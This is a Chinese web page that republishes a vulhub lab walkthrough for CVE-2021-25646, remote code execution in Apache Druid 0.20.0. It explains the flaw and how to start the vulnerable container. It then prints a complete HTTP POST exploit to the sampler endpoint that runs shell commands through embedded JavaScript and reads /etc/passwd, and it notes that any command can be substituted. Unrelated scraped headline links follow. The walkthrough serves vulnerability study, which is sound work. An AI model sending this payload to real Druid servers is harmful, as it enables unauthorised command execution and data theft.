当前位置: 首页 > news >正文

Apache Druid 代码执行漏洞(CVE-2021-25646)

news 2026/5/12 17:32:58

Apache Druid 代码执行漏洞(CVE-2021-25646)

Apache Druid是一个开源的分布式数据存储。

Apache Druid包括执行嵌入在各种类型请求中的用户提供的JavaScript代码的能力。这个功能是为了在可信环境下使用,并且默认是禁用的。然而,在Druid 0.20.0及以前的版本中,攻击者可以通过发送一个恶意请求使Druid用内置引擎执行任意JavaScript代码,而不管服务器配置如何,这将导致代码和命令执行漏洞。

参考链接:

  • https://blogs.juniper.net/en-us/threat-research/cve-2021-25646-apache-druid-embedded-javascript-remote-code-execution
  • https://mp.weixin.qq.com/s/McAoLfyf_tgFIfGTAoRCiw

漏洞环境

安装docker,直接使用vulhub(https://github.com/vulhub/vulhub),执行如下命令启动一个Apache Druid 0.20.0服务器:

docker compose up -d

服务启动后,访问http://your-ip:8888即可查看到Apache Druid主页。

漏洞复现

直接发送如下请求即可执行其中的JavaScript代码:

POST /druid/indexer/v1/sampler HTTP/1.1
Host: your-ip:8888
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"/etc","filter":"passwd"}},"dataSchema":{"dataSource":"test","parser":{"parseSpec":{"format":"javascript","timestampSpec":{},"dimensionsSpec":{},"function":"function(){var a = new java.util.Scanner(java.lang.Runtime.getRuntime().exec([\"sh\",\"-c\",\"id\"]).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:123123,test: a}}","":{"enabled":"true"}}}}},"samplerConfig":{"numRows":10}
}

可见,id命令已被成功执行:

image-20260210161735665

java.lang.Runtime.getRuntime().exec()内的命令可改为想要执行的命令

http://www.jsqmd.com/news/366399/

相关文章:

  • 毕业论文救星在哪?AI 写论文软件排行榜速看
  • 突破种子搜索碎片化困境:Jackett重构你的资源聚合体验
  • 宝塔面板nginx安装modsecurity(z.ai提供)
  • AI产品经理与传统PM的核心差异,小白也能轻松看懂!
  • 交稿前一晚!降AIGC网站 千笔 VS WPS AI,专科生专属高效之选
  • 口服抗衰产品推荐,2026年十款网络热门NMN抗衰产品分析,兼顾成分、吸收、功效、性价比等验证 - 资讯焦点
  • 航班取消时,谁的客服更稳?同程、携程、飞猪、去哪儿四平台客服响应横向测评 - 资讯焦点
  • 2026年2月心理咨询机构深度对比,师资环境效果全方位解析 - 品牌鉴赏师
  • 如何防止串通投标
  • 航班取消时,谁的客服响应更稳?四大平台服务能力横向测评报告 - 资讯焦点
  • 江苏破产律师张茂诚荣膺LegalOne长三角破产重整与清算领域杰出律师 - 资讯焦点
  • 拓竹 3D打印炒面 拉丝避坑指南:这5招让你一次成型不浪费;耗8小时+半斤耗材打出“抽象摆件”?很多问题都是底部支撑没有粘牢,导致墨模型倒塌, brim设置很关键,内外侧8mm 第一层就结实了
  • 哪家公司做GEO优化最靠谱?垂直平台才是B2B企业的“AI时代入口” - 品牌推荐大师1
  • 实用指南:Linux常用命令详细介绍
  • 小白程序员必看:如何将大模型进化为能“做事”的智能体?
  • 国内微型超高温杀菌机制造商,专业生产供应商 - 品牌推荐大师
  • spring6-与juint和mybatis的集成
  • 2026年资产管理系统公司推荐,优质资产管理系统平台盘点 - 品牌2025
  • 【计算机毕业设计案例】基于SpringBoot + Vue的学生档案管理系统的设计与实现基于springboot的学生档案管理系统(程序+文档+讲解+定制)
  • mac电脑通过yunedit-ssh上传文件到linux服务器
  • EServer完全指南:一站式本地开发环境搭建与多服务协同配置(含4个实战技巧)
  • [CCC 2023 S4] 最低成本道路 题解
  • 第10章 容器交互与调试
  • 7个核心技巧:AI绘画工具从入门到精通
  • 【计算机毕业设计案例】基于SpringBoot的社区便利店购物平台系统基于springboot的优购在线社区便利店系统小程序(程序+文档+讲解+定制)
  • Java AI开发实战:企业级应用的LLM集成框架解决方案
  • 同步机无感 STM32低成本MD500E永磁同步控制方案,pmsm,高性价比变频器参考方案 m...
  • 吐血推荐! AI论文写作软件 千笔ai写作 VS 云笔AI,研究生必备神器!
  • 零门槛玩转Goldberg Emulator:从新手到高手的蜕变指南
  • 企业级BI工具DataEase无网络环境离线部署开源方案:从困境到落地的全流程指南